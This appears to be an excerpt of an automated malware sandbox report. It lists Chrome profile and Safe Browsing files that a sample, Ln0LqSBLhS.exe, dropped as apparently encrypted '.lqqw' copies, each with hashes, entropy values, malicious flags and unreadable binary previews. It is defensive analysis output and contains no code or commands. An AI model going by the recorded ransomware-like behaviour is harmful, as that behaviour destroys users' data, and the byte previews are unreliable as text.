                                                                                                                                                                                                    Preview: I......c.o....q.....|....+...N6V....)*..C..K.%.........Ee(......s.....2.s....7....z.C....~...`.bO....PZF...`P..P.JLJ.A.l.........;^+. )....Kx.q.*.........F".y&....K.D...b.#5..0.D...*co..^..G.......K6B.\.....T........(.[.N....i<".,.0... ...30..+~...u....o..H.........8R.r.~.=...;..G...R...RW.t...}...hr!._w.H2%..p..JlX#....U..F~">K.W.-.[rZR.A.D.+..V.MBV.y.&...7....Ai).>..$'.....A...GS|...R.......V......%. T.9..u[..........t.....N..K..o/.V..`.X......|.b.N,.IRw.3...'R]@pN.._[a...j.u......o........v|.....b.+T.B.$......IV++....b. ...^..J.i.%.y.m...&....r.^..v...7....fZ8E^....1R.+.-....x.6..k}..F.lZ`.'Z_-C..5...{=*..:.X.Ps$..rn...o1!.....\\F.!...I..*..k.Ab.....L.I^....-p.y,.....:....8W~.{.{.....L.....<.;....~..5..(+..J..../.:...\R.r..y.n..,.K.W.W~,.*jV.(..??...R.F=..I.T'j@.*LO.....:.Cd......&Z.:&}u........k._......W%(.6.S.`...zg`.a...zAb.p.\...,_.>....cS.._M..q.!..q.M..#.5{..6...r..R.h.....D.....7-...\..Yux...D..sb..Q.0.7...*.....~.:.T...
                                                                                                                                                                                                    C:\Users\user\Local Settings\Google\Chrome\User Data\Default\previews_opt_out.db.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):16713
                                                                                                                                                                                                    Entropy (8bit):7.988954318836082
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:nFuhAPlqrq7X/jNgJLSUklVGnBA0v9OfcxRnVBKooJ:FuQbvCSUysBseRnVAP
                                                                                                                                                                                                    MD5:9D1B5599BA4EA4DF53A161C6642809AF
                                                                                                                                                                                                    SHA1:7F01D046B1D85104173AAA93EE3084D1F43D1660
                                                                                                                                                                                                    SHA-256:EF4842971DC54A926AA487DFD6AE9ABC109E5813232C373081CF2D7ACBF099D9
                                                                                                                                                                                                    SHA-512:F7F33FE4EE01A0ED6F6E60AC2252B73084509ECC0528136C1CDB48F587608D79CEECBAE6E2BA2EB7EC486F521BECAC86625EE8A0C9DCC14FC25C223B6F25321C
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...w...R..1...Y..xH..Q<?......&..5...V...)..8.m.k\..z4.x.V..<..Q}.j......Vg.q+....tQ.-.&...A...".......^..2KS...>......0P./].@q..*..+;.I..Q...[.Ek..7.6...MR.<Q..q@.a....-d.C..['..+.).5..Q ..S....=2.vF.......B2...N..*...fp.....5...o!f..(..:..=P<:"d..!.B...y>.0x.....<.....k....sQs...U5..0WT.....P......m.g..7b.4.........+.z..Fr.Y...L...t?.Y....... ..hA..{oT.....FX....j..".!zp....z!.N..8.^..C.S....g".Z..........L..N!h\W..l~...W..:.A.b.sm.U..K.C...L.9=..1.s...Q!h+j..TM..C......1.. ._.J....wp..*.Q...w,..]....>?..5..T.A<..WnF.0.;|[1.4'+...Y..i~9P.!.@.....x...J...=a..y.....4d...8.....(2.ml.:n......".......J.v.....a..Bw.n.]....q..q./_.....g..^....-..F}...`L.......(}9Y......'.A6.........t.6yM..02.u".W..J..a..Q.....`...K.zr..g...}....;d....#.M.......l.7..H...R.7P.kF..>....F../.vP....m2A..=.L2....9.O.}.9....tBE...d8.c5..\{.r.$M.."W.9.I...6...Kr|.....h.z..O..y..4...H..P..r....U.e.>D...P-({...).<........5...@......L.[}.T.io:.l....C.P%d......|-E5zd.S....k..
                                                                                                                                                                                                    C:\Users\user\Local Settings\Google\Chrome\User Data\Safe Browsing\CertCsdDownloadWhitelist.store.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):404
                                                                                                                                                                                                    Entropy (8bit):7.276902571394724
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:BvNOJXKF3qnYC6TmOUhWMqdnIOH0u9MmXcii9a:tNKK1qYCAeWNZH0u9LbD
                                                                                                                                                                                                    MD5:63B3DE74A38E75C8E82906BC1A09B786
                                                                                                                                                                                                    SHA1:6EFE0CA4E853AB734D697B25E7B2807ED76FE6F5
                                                                                                                                                                                                    SHA-256:143101E58D490E7E40C9FFDB6D568B75BD80DC8643F611146DE6F86219AE0CCE
                                                                                                                                                                                                    SHA-512:B8B7E5D12700B9CE0968A1E3BE24EC66530BFC0B790D1C179AE8F246989120C5F6AF79CB5758125F63C12B6D06D952511EF14D1C062BAA736987EDC84BC12E1D
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: y)..#..x./._.'....(..O.5.,...5.'....e....>D?dD....E..6..%Z...^.-.EmX.}._..|^Y........%.....E..i.........z........P.j...y@E....v.q3.....b4.W......| ...^C.m..n..F.r@...8.KXF4q[-7.....C.V;....(qGa....`~%.~.....X...a.n.(.u...m. ......I......?;.z...G....U.B..5}... .V.JG.(.W.AB.\..S.{..7wwk.U......x.J.~R.....H5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Local Settings\Google\Chrome\User Data\Safe Browsing\ChromeExtMalware.store.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998786228021931
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:4u6qGAmoBOoqluC7a9v8bIiFgTphSrUR/wFsGucKSIW0D:mAmoBOTlU9SdFUh44/Y9SD
                                                                                                                                                                                                    MD5:342D45222D541066B81691B65E25443A
                                                                                                                                                                                                    SHA1:60DBF7D3F91D95A0052BF60CE46F26D00E6DA509
                                                                                                                                                                                                    SHA-256:45EB73F5E206B90A2058A052CE21EF37294C4140F3B48B1E3F4B9DF3D1E0C031
                                                                                                                                                                                                    SHA-512:B2E03ADB28C2131FBAD0F8C1FF388858AA988FAF2094D929AD0C3CDF1E4E1998C537BAD83ED16ACB66BA82B524866B9244A4C00F0D9FDD551AA4D7F7CF1C382A
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...s........'\....^i...{......7.c.5.....O..zo19.M....'..%U.v..j....;.8.l....v....=./..d...KS.Q...x.....E..<}.aZM).....|o\.. .n...4.p..sJ.fU..2.{O1...........GN..f.ytl........r4...+....V,5r~....)]....S1<u.UmV...m...r"...V.m......W.B.#Eq...!G....0R...;.9.>.....u.R}...ek.x..ZpL.N6y.!=..C!~J._...D..nA.....M)A.y.6..+.K..EI..!...G..rs^<....j.<u...|.. ..c.....x&.....P.t..1i.......$V`......{g);x.`..d.-3.j...Y.P..j.. y...U..Z..FT..H./d.x.IYI..K......v*B......q.O~(l8+....Y~.I...e~.cu.....j....v..Y...dgA..}....$J..u.t.d.-.Q.b.....fg..7.6.#.6vK..'.m...u.jz..<0...$.v./.._pSb.e.J+.....P......"d-......W{.>C~.1.}.e.;...et..Kbw.0._7..S[=........k..E!H6..%{.O*o.oq..".7.......fr..H|:u.=.2...^E.-j..'....?B......Q.......\......?A.o.r.k~.s..qF..B.?iw.Bk6y....Q..J...G.k#..................V...5..$...c.7U...}._8...zy.......*A..b.wy.j>.[.!..{..2"]....W...n[.......x.".U......G...;.at..?.....D..t.8.g.$. 7.^.Y.oz.l...c...3.v........[...y....z...y.7......}.{...e%.
                                                                                                                                                                                                    C:\Users\user\Local Settings\Google\Chrome\User Data\Safe Browsing\ChromeUrlClientIncident.store.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1054
                                                                                                                                                                                                    Entropy (8bit):7.761842249709138
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:87PX+T8aTku1F+eaeqf9poINC+/D1RSrXbD:87POTlz1g3Vv1o+/j2D
                                                                                                                                                                                                    MD5:FC21F0F8C5EC11AA5A3EFF1709E4CE8E
                                                                                                                                                                                                    SHA1:B966905844E66555B0BF45BA9D9BA81C323F1DE9
                                                                                                                                                                                                    SHA-256:B0D429B4BBFCB6ABAF95C6CCA0D20C9ECD8BF49EE003202B1A43B76687CA8D1C
                                                                                                                                                                                                    SHA-512:FC63ADED644AF0BFB5C91561A665CBF540CC328806B0B460134BD95659150A94AC2729DCD52BA294158412AE8306140B62C36494451B9E3D8FCA9E80F8596DF4
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: k..,.....E.|V..sJ$0...K..?@..~M)...(.....~.K.W...9)...E.#.#a.!.CXt..&...b.g..r........f}mY.=...[.=.ud...J.-.7JWcq...f.....!~kEyI.3...TKYWq......K.eH..2).......`ZGxd.s..3E........Bv.I..R........{..`.D%e^C..=../I.......3.*:.*3.}k...:...J\..`......Z.....\LP?...O.H4.=".. .....;....M4..@p.q.[.........0...a.pF.&..I.r.5.. .yU..v..~.......z.o=F.MTw.u.q.\.{.9...,.1..,....._.g.T.....Lk.. ..W.....!Vh.s..u.J...63...8I.....P.]......z.e..${....D..#.....G.....f.....^a4.I"4.4.2..C..1.2f#>..E..h..N8...H..)."r.2.Y.L...$.%;T..2T...#a..e.>..R9.].J"......A..>@PPG...0RS.4..,..=.g.D.v........x~...*..""w.C...Y'.]:TUx.@\./ZD&.........'..]........j9...q..$~......H[../9.....#............X.O..>....{.#..D6.e,...n..../..].._........>.....=q....A.......GN....m.$,.Z............t.2.3.E^8.K.M.1...2.c."o..)...>q__...O.&.......a%E...G..5T./o.U\.'......{d.S:1.^d.....`.....*w.-.M$"]..om......V.=V.O..9B44....cxa..v0....MH.q'.i.....|.....&.#J.>t...7....@....5VPEIoxEWaaB5A242LGR5OT4
                                                                                                                                                                                                    C:\Users\user\Local Settings\Google\Chrome\User Data\Safe Browsing\IpMalware.store.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):435
                                                                                                                                                                                                    Entropy (8bit):7.358504947301477
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:Iken7wa4F5F20yDZcdSuGmeLkaYacii9a:I9waCFzDGdLhYabD
                                                                                                                                                                                                    MD5:9DA5ACFED82ACA5FB59016FD956114BC
                                                                                                                                                                                                    SHA1:8E7B1E83FF9FB3047EC30C5CD9713BBB91500E07
                                                                                                                                                                                                    SHA-256:D8676C310F0F7E18ACE8BDD95BF4255FD6AB3AB982ACC4748EA4FA7B302010B9
                                                                                                                                                                                                    SHA-512:350420ABC61A6437CA96DEE900EFC625E26CF717B0A31865019E53B0CB27720117F229B251446E424D7ED8AAAEF15C64339CAB9DDC11AE2F4EE7DA038A15C36B
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: FO*[......&.A..2b7~..........V..2.:.....x....NJ,/n ..d.....,.l.+.,....y...ke...B3....w.D..).9L...,-..t./..;.k/{.....h<=...WE.....lW.:......}.x{..dwMPw...@..)..>...~A\x..y8qJ..z.J.....C(.5..~(p.....P..A.d..xz...%q.4...M....)g. ...H*..V*C...E...0....k..L@..H..w..~n.........f.....2.d.?...J....?../.>e...... ...l....+`.. ....u$q..].=*....5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Local Settings\Google\Chrome\User Data\Safe Browsing\UrlBilling.store.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):21163
                                                                                                                                                                                                    Entropy (8bit):7.990283229241652
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:384:Fc6qqLbO63JAK7NULjDRHtZEaq4tpmRb0CGrPQ1hzzY4bR6eMGnXfTYhOOqVpwZj:FcL63BUL3TZENmmx05TkhY4YU8hnkWZj
                                                                                                                                                                                                    MD5:52DF7DFFB03849E367A00A2F8BD5868B
                                                                                                                                                                                                    SHA1:FF84231A110AF532C5859F5B473B8BACB7A35336
                                                                                                                                                                                                    SHA-256:5A75497DFA5C7AF028CE62DB2F1E0289BC7E24E0C0B8801D20C60B5B815887A8
                                                                                                                                                                                                    SHA-512:849296A069DAC921D421B446E040B7A5E039713FE11AD4FB18E736DE1B220F768B44546187EF0AD64C319659066DB44A47EF91B8B788B486A5763D37CD5AC897
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .-........@..&m.X.L.E9...|=.A@...C...V.1.P}=.N..rP..{pn.,..x.v,...."...l.4.9....c$.\z`.."...i&-Kk.7.4.z0......d.{.'fE_.e!.X...1Vv5Y...<z.7.!6y.dk.?Bk7..b^..xYn........U.C.k.c%.I.I..yo .J.z...,.Ml.j<2..y.Poa..*..0..5.......K..D.RI[u...Y.h.......M...?.?."..DU........p64..D.....Gc..o.....x..z..Ca.{ P..[..F.X.^8..2...a....R$..w..tk...X...c#UU2/....K%.....c.u.~u...f...q.+V.14..h.....;n?.a|b.u..J...f...c..C.*ru.d......Xb....Q..!v....7.F.^....?..s.l4.p.f,.VB....O5...P.U..4j.,.g..[u.}}1.......s...a.j.u.i./I...D%.)l.)_=$xT.!|....ro.7.|7A.Z.#.gq..wg...(.^...m.\..H.+...H.-^....w.O.I..q......:...X...1.$n~..9..:t[../.........R^..r..4\....7w.5.....Q.d....#.....b%..3m.~.k....r>.>F>...&I./...6(&^..........;.i8.Q.`G...hJ.........?...o..S....0...z...k3..T.,.....f...-.kS.i..F+.........~W"...J.."0..M+......GM...|R..}6.......93|.RdO.>.G. 2.....!..9^..>!.....tq"..)(.X...K.5.d|N....|.|..6.2M....>....(.}......./x.Fg8SC\.......\....(W.hf...0.6.y.........8
                                                                                                                                                                                                    C:\Users\user\Local Settings\Google\Chrome\User Data\Safe Browsing\UrlCsdDownloadWhitelist.store.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):33318
                                                                                                                                                                                                    Entropy (8bit):7.994643369711628
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:768:nFNTTOeazEiPKbQWQOWb+7JrXm8uTHBwAlUCYMe36hHL3JDoQC:nVi6bQWEkg8uTHBfpeqZ23
                                                                                                                                                                                                    MD5:5057230BD19DF4A999BCB82B233E0C4F
                                                                                                                                                                                                    SHA1:CB09869631C884FC50C84E821E9132E2723B459C
                                                                                                                                                                                                    SHA-256:604EB06CF590F946B3B550D1351731E538AFC6F1A4B0114F568A64899960422A
                                                                                                                                                                                                    SHA-512:525D6DF2A181E0F9833AB4C7F1F886578AD5AC68718070B8DBB83A17AB975435CC71E694E1792976F492559AED7B5DF757CC48B5B5113E25CC592F817FD6DCF5
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .>..6;.WT.$.qU......uC6.....4wI..G...."./G..j....y....T.....|.p.i..+.)..&.......W.....)>..U...g7.I \?>.5..y0`....c.\.b..........X......Ve9F...r].X.*e.-(...Xij*%.....&[t7..U%..3.;..<.../x.H/..#. lh.pV..2L.x...q..(G.;=...........9z.I...{.'..R.jU.n{..4...0.!.>...C...iwt....bf.Q_'WT..@M+w-.....(W.t%7kxL.!......_.M.R....4...m]......J....#...h.....^#...%....'.G~x..l,@e3....P...6....9.T.Ym.C.(r...:.p....f5..._-..`.'l4._ym.UL.&..8....k.9..}.0L;.Y*Sd./.....<i.a..w..I.T.*.k..6.k....7..<.1.....1.lP.o..w.....VCAh.1....H..K..9/...q..HV>.c.k..e..G.n....s.$...1v....6.\.!...>>7...8.S.!zw./..w.wg..KRm.t^3..woTn.....r...Q.*(.H.Vv..j.z...;.B.)n..=VQ..^.~K......yD..>t2.B.DC..N}.C0.K..x..*.y...I.. .f...k....:Vmrw.B.q*......A..a4^.r...y...}.+......![q8.t.....JG.....#...6...|7c..W....Z.@X........a.mm..to.v D...eB....Y.8[4rc...B...cI../.~1*.%..!..........`..&...}..;.QK..U....0....%.f...N..R`\x..x^.x.[Q.sbh.N..=..rD[.DVF...M.....Q.$....PYr..pt...&..h.x....1..
                                                                                                                                                                                                    C:\Users\user\Local Settings\Google\Chrome\User Data\Safe Browsing\UrlCsdWhitelist.store.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):5056
                                                                                                                                                                                                    Entropy (8bit):7.9710660682888825
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:0m3jJF+Scvjz2jF7FZKeKW3Zevn4Un5SJYdUEwtHFk:0MJlmjzWBZeP/5c1EwFu
                                                                                                                                                                                                    MD5:BBC04E88BD9D42C7DBC4613D79627556
                                                                                                                                                                                                    SHA1:DCAF6B63668C9054AF5B50E2EE9BD58F63212C05
                                                                                                                                                                                                    SHA-256:0546F59A9A3AC8C8724D49019D7A97BF6208871C719AFB8707499E8A4C2948E2
                                                                                                                                                                                                    SHA-512:A1BFAB04413504EC341C2787853D46C87374174077FF6FE75975FAFF82661001988F9B78892B2D8F453C43D5E3D6AF8A98FE95A3F1AF4A68CC536011B80CA572
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: cm.Q....B+.......%rH;...F2*X.q....7..Kr.."..........#.t.....$EXs.e.K......z.ns.#....e...d.:......SU5..F.:..NY.n.....[.~.b%Ohk).^......xW....7Q\..<..i]...F0.x.G.|.GB..j..`.....U.. .86.o....q..Y...5..+..}....z...N...........Y.>.q..=....P.....s.7..Z.\ZT..#..R.........y...j.C...z..Cne.9.n...........8$....zi[*8..j.g..Fz...d............cZ.Z..Zvc.'}?.Ne/Y.+..T.4..........K.h..w.U..8......lj..K.K..69.\~..a&1.O...}.G............I}....S..LqP.........h.C.Y....i...A...2/|.D;.Su..M.M....1i.R..2..c..C}..gGq.x..:....XHF..A..m...{.C..x....S..4..v1.....4....cha.i.1.+.^..G....p.J..P~.(D.,s....I.l}...3.Z.Vm.{!. ].4._....+O.ur.N.i6........2$QR.;.Q.%.F..6..*^.<_..W.....|.."U ..AA.......k.yl..Z..V.to1..{.....'P.M...=...D....S.z......l..;.....ZR1..9....G.Wm.t.9.!.u....yJ...#.1.z.^m.~/#;..S......2jj....?.....fw.e...M@9.L<)..{.:T....'/.n.6..O.....,8..~n.....+.Kk......r..p{.=:'=r..d...l..XAH...C....W..-..S.....x._.....o. ...../.o..aC.f..?.4b.z.sv..
                                                                                                                                                                                                    C:\Users\user\Local Settings\Google\Chrome\User Data\Safe Browsing\UrlHighConfidenceAllowlist.store.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998724466346985
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:SCHGr/mymEzXho3Fo7518tNZUAMdk5ojQJ8frxO9CPK+Uep/JG:SCHGz7Fo3Fo4i9dkeQWTg9CgT
                                                                                                                                                                                                    MD5:61F053F77AFBE95047D1D7D4404EFDFF
                                                                                                                                                                                                    SHA1:7886C86556F0E18650EDBA91CB01F3003520DE5C
                                                                                                                                                                                                    SHA-256:3F34735BEA8FBA858DD750D19514BFCDD3CB314307D8CB099AC081E93739C10C
                                                                                                                                                                                                    SHA-512:F0F56BDBB2CA12DE9694B97D7F74F4C4A0B89B5DDE346EFBF34302AB0B3990CBA172E1782F9ADEBC7A7B3D1C39CC050C7F670D995172F7C0ACB819E008D1E922
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: qL....G.I.....B....K.....E;......@...c..<uX..'..|0...x+Z..`.#..Z.......M..P..r.....Abg......UE.P.Y...X.."._.......HU.~......./......J.....~....+.#...*....(i...v.2...!X"..m!Osb.0N....'N.kk....^..Q.w...:..P.H.g....\..9.R.......N..}c.\.U$._.#..Vv..l.....eZD...F..r.<.....J<...}\.-.4..L.l..!.g$.}..TmK.....U..!fxo.].......k..W..-.B...1..}..E.Y....Kd.y..._".#,...W....m...%.......4....l..Sl.6+.s_.G.s...O.U5.....:v....oq^.eR..4..)#gk.q..0...)RY7.X|.}...........Bf.'p..H..:<LX*.7..t1.#=...z....O.^L..9..Q.7+...\.p .JA7].T.;.L......P....[...../......RD......7e....Y. M.lh...p..8s........'<.'..8#6.ln..R...n9..P..h.0......5...6.!k.x1m...{.K....d.n.eM>.l.....r)....*.=X._..Z...m0bp..W..CV....@^...n.........?...5.r.[..xi..3.f%.........|..I'.b.d..d..@........y.gl..Tp..z.S.u.....U...B...I.....}....P....q#.W.]L..42.8.n.Mm......;.....D....B.U>~.<.b.;,....Z|.-..%..1ID..w\.c8,B.J....M.....r....y.^..&Sn.....5.v.2.....@...w..r.p.........n..W.w.S
                                                                                                                                                                                                    C:\Users\user\Local Settings\Google\Chrome\User Data\Safe Browsing\UrlMalBin.store.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998835038922084
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:3ZzHCVqy136dX7k2lKd08ATy1TIiTAig0695iX/QPZhg:3Zaqy136dX7kHrHp9Zg0695ivKg
                                                                                                                                                                                                    MD5:44AFCA458AB64DC6021F0DDFA90A7F7C
                                                                                                                                                                                                    SHA1:1A195572E4341624298ABF0144AAF0880C768BE2
                                                                                                                                                                                                    SHA-256:A417716D79D5B009F5D8FC7918776004570B47827DE21C457ED6260F3C153804
                                                                                                                                                                                                    SHA-512:1AEF877686E73DED9E1BE703A256D8A49ADBE990A744AE6ABC0E6976C12875D1BE86824E39DE539065C7A87B308491AC634968F77E4AAA6E5856D1C0BBFA2A8F
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .....,m..{.n./.F*..9.wG..C...v...v.} {....p"......MQC..:=i.py...G..DH...S..Q.g.;.j...w..p"<..z..!5l.Md..+.....W.a.......37+.o.,0.,.......Y.`..".A~.z3..;...."l..8.{Ai./cp....z.Pm{.p.......I....`.......#.C.}.c3..9.3.I.u...x.?.8.Y.b./...T.*.. ....2...d...0h...]...........sYe.....X..Z...]l..^.IR.`.J..Iqz...........m.MR82....y..s..!.sy.CB.f...xl.Zt...."v.u.K...G|:.....I..`B.A..Jot....,..m...F.$..ShO...W..L.o.j...QTF..6...D..'".Yk9.-.........*.m().!k...\....3..M....v...../.\...X....{.RR.f.Z.j&.....\........".q...s.v'.q. ..^)Yxo.p!.]$.....w..W.....Zh..n..=.3..]..Q1......d+.].}.;.4)...&.....T.(t....B....\.8..#.H..(.L>..2.._.K.I.......b....`.'.S..6.....\,..o...N.yw..3.S...X.#%PRe.t....{E(.8."2Yh".D8Md.m..0}.k..J..d&.My.&.....f.&.i..r..sR.L.(yW\._.[73..\..........4i.v..).}..*.....#..B..1..._..l)..[....`. .}..n..hr.,:.~..Uzd.....~c4.,..Q+.{..Wz[<......;.Fw.JU..t.aR.....a4.Qc.{a..rZ!.3`.._2OB..c1...%..'.....{......'..n....m.T.....<D...P.....7.B...Ve*.$..
                                                                                                                                                                                                    C:\Users\user\Local Settings\Google\Chrome\User Data\Safe Browsing\UrlMalware.store.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):103568
                                                                                                                                                                                                    Entropy (8bit):7.99822090908286
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:b4hjYO8j4EBfPI/vIIcUICr0e67DVTqFmtLwfhn:E1YjBfyHBh4/ft85n
                                                                                                                                                                                                    MD5:F43853E8D61185A7BB6B5FB8251518C4
                                                                                                                                                                                                    SHA1:A61F3CDC53315389CC1E3E4EC18795016C0CF245
                                                                                                                                                                                                    SHA-256:83B4E847BC620474FB43116BDF081055B175C6E7525F9241EA6242F93FE7449C
                                                                                                                                                                                                    SHA-512:774B9A741D10AD19DDF9D1C7DFC5F276B8B6250335AC2D2DA433C8EF9FB6CA81F109457A4339C86FCE5E5DFAF63D8FED3B20674E9F5E2ED3AED9636AE7B10953
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: @`..gXi#..1.TD.F.._!)...$..P^T8...r.!.|.. !~A....s?5l.,..>....w..zQe..;qZ..hd@.....O....>xy2..9b.d].S:........^.iSk.^.u^.:MV..w...W..4..C.6f..Or8.i... .YD...0..]=.Tt7.k=.......M.9.&YH.x[..v.....[.....$.....,.....~.....p..:...r....7B9M;.K4.."I.z.Vt...i$.#....h.....r..+J)q&.....G..0v......$.-.....2.../..s...F...H.Pd.>.rb...n...!..CR....88.#8c..".Y._........Hl..q......7.T.D.G8#..k.#.@......r..x..=!.?.L.D......=t>.f&I.J.R?g.....HC.=."N..E..Bv.[..(.......nf;.P...R.]..W|.+.M<\^..-.u!.L......A.@...."W.^H....:..N.a...ND.7..q...]-.w..).`........fk%|.SDc.o[.V.x.V.^..o.7L..9..j.3.h\.F.9..a.Jb.8......Q].i..F..t..5.&N.l.\`xU.*G...XNw. 2.J............{..[av...B.>k.s.|......+..&?..k..n4.[.e..1..!...E./+..l.d.#.....^...L.ZaME.h.8k..#.k..&.Y.9....Z(.6V...F4...*...E%J.9.Z^.h........h4Z'i6C)...a*....T.5N.=D}...5..y..z.......5:.h9}...0...4..t..B.....}...p..V...,=zc...$qC..X....2... ..9.G.......p.F...Ju.....v...G(.b{.C3.mR....M...jK.F..g."...,.P...q.p...
                                                                                                                                                                                                    C:\Users\user\Local Settings\Google\Chrome\User Data\Safe Browsing\UrlSoceng.store.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998880437228105
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:oDJUGNqCObaC27LdGvICTmfBDMJDV8Fyz+C///wubA6y0:A7YC7Z7LdGzwMxWMzZ7A6y0
                                                                                                                                                                                                    MD5:AE54B877F6EB938D4E92F4E9E78450A2
                                                                                                                                                                                                    SHA1:AA9F361AB2A029634A41F661E70461C2DDA3C174
                                                                                                                                                                                                    SHA-256:29DC7487E97DA45E5A2A142B4955091DFFD4F2A9BA8F41A428484F7A1D53B597
                                                                                                                                                                                                    SHA-512:426CB735290FF9C2120D93F66B2E8D860EE8AB4E62F1A19FE29F5F9DE2F3F7E0D8CB9CEBFF279335E663D6D19C298A21F47E989CFD0E1179E4B58A761F109F70
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ]..../...5^.........N\..b.........F..I....[C..f.~m.\..A.D.e..Xl..p.X.PtRF...;....*.)...G........HAsC?j._...f..eB..O;e.@.tA...#.......$t..u......lm..f...f............um.av..S..........N..tf........4.b...sc...L..G....M.}B.f .P_...R.]..s9.....KG.k.JX..X.X.p..L..$..H-.,..e.J.v)..."...l\.w.".p..?.l..?............*.......=.2.5!Gy................H..h.....H...^~#`..N.#.e.O....$-D....C.JR.q.Qn7-..\\.?..K.{..5..Cz.......rz...a....._uhO.TB.....M.....v'?.k....v.]...i.m.#.:...}4....W..N5!}..t.Ar..w.e...E..+..qR.1-....L......4.c.^Q.....V.~.6.0............/K.u.....2.-T....3~..e..Yq.A..t.y.p!i..;.-..J.8*.g..P....@....* .......x.(..._v`..2..N...q..z....D.V.;_.n.U'W.f.....Vo..L..j......K..C....U._.ymc..7..5....Bw..*D..l.S8;..M..G..4H.-.v<t .P...t.&h.zr.M.}.t...7c.&4..'6y..$.<.j.]..xiWa...|O..Y8Z..$.k..........d...ML...Gm...a...m......~.f.......#..l....`cnK....7..K.;..d..Q..~`....q.M.?..[.5....o.OM.;.....A....&.g*..8.?.e .........]..B..Ls.|...f.\,.._.
